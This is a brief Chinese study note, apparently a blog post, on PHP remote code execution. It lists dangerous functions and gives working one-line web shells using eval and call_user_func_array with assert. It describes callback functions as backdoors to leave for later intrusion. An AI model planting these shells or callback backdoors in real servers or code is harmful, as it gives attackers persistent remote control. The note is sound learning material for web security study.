RCE随笔(1)

哪些是可以执行代码执行:php代码。

eval

如:eval:<?php eval($_post['key']);

eval:php中不被叫做函数叫动态执行命令

assert:执行函数

call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

传入xxs-labs/test.php?shu=phpinfo();

回调回门(用于留后门的,方便下次渗透):

回调后门的闭住:call_user_func()

call_user_func_array()

call_user_func

array_filter

arrya_map

uasort、uksort、array_walk、array_walk_recursive

preg_replace

当匹配的格式有**|e**的时候匹配到的字符会投到eval里面执行

哪些是可以执行命令:服务器的命令。

相关推荐
老马啸西风5 小时前
windows wsl2-05-docker 安装笔记
运维·windows·笔记·docker·容器·k8s
菜还不练就废了5 小时前
7.19-7.20 Java基础 | File类 I/O流学习笔记
java·笔记·学习
菜一头包7 小时前
C++ STL中迭代器学习笔记
c++·笔记·学习
LIl_7 小时前
lvs笔记
笔记
creator_Li7 小时前
python学习笔记
笔记·python·学习
骁的小小站8 小时前
The Missing Semester of Your CS Education 学习笔记以及一些拓展知识(三)
开发语言·经验分享·笔记·学习·其他·bash·excel
阿群今天学习了吗11 小时前
面向对象基础笔记
笔记·学习·算法
wyn2000112813 小时前
Git学习笔记
笔记·git·学习
rannn_11114 小时前
【Java学习|黑马笔记|Day18】Stream流|获取、中间方法、终结方法、收集方法及其练习
java·笔记·学习